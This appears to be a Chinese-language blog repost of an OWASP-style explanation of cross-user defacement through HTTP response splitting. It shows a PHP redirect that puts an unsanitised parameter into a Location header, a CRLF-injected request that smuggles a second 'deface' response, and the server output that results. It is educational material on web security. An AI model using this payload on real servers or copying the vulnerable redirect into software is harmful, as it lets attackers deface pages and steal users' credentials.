跨用户污损,这是一种攻击!

原文出处:https://www.fortoscer.com/forum.php?mod=viewthread&tid=4&extra=page%3D1

跨用户污损

攻击者可以对脆弱的服务器一个请求,将导致断绝创建两个响应,第二个可能被误解为一个不同的请求的响应,可能的一个被其他用户共享与断绝同一个TCP连接发。这可以通过诱使用户提交恶意请求本身,或远程的情况下完成,其中攻击者与用户共享一个共同的TCP连接到服务器,例如一个共享的代理服务器。在最好的情况下,攻击者可以利用这种能力来说服应用程序已被黑客攻击的用户,导致用户失去对应用程序的安全信心。在最坏的情况下,攻击者可能会提供旨在模仿应用程序的行为,但重定向的私人信息,如账号和密码,给攻击者的特制内容。
这种攻击是相当困难在实际环境中进行。条件的名单很长,很难被攻击者来完成。
跨用户污损攻击是可能的,因为HTTP响应拆分在Web应用程序和缺陷。它是从图攻击者的点至关重要的应用允许使用CR(Carrige返回)和LF(换行)的字符多于一个报头填充所述头字段。
风险因素
TBD

例子
我们发现一个网页,它从“页”的说法得到服务的名称,然后重定向(302)这项服务。
而redir.php的示范代码:
  1. rezos@spin ~/public_html $ cat redir.php
  2. <?php
  3. header ("Location: " . $_GET['page']);
  4. ?>
复制代码
编写适当的请求:
  1. /redir.php?page=http://other.testsite.com%0d%0aContent-
  2. Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
  3. Type:%20text/html%0d%0aContent-
  4. Length:%2019%0d%0a%0d%0a<html>deface</html>
复制代码
HTTP服务器将响应以下两个头信息:
1、
  1. HTTP/1.1 302 Moved Temporarily
  2. Date: Wed, 24 Dec 2003 15:26:41 GMT
  3. Location: http://testsite.com/redir.php?page=http://other.testsite.com
  4. Content-Length: 0
复制代码
2、
  1. HTTP/1.1 200 OK
  2. Content-Type: text/html
  3. Content-Length: 19
  4. <html>deface</html>
复制代码
如果用户共享一个TCP连接(代理缓存),并会发送一个请求:
/index.html
响应#2将被作为一个请求的响应 发送给用户
这种方式有可能替代网页,这是提供给指定的用户。

更多信息可以在演示文稿中的一个下找到http://www.owasp.org/images/1/1a/OWASPAppSecEU2006_HTTPMessageSplittingSmugglingEtc.ppt

原文出处:https://www.fortoscer.com/forum.php?mod=viewthread&tid=4&extra=page%3D1

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值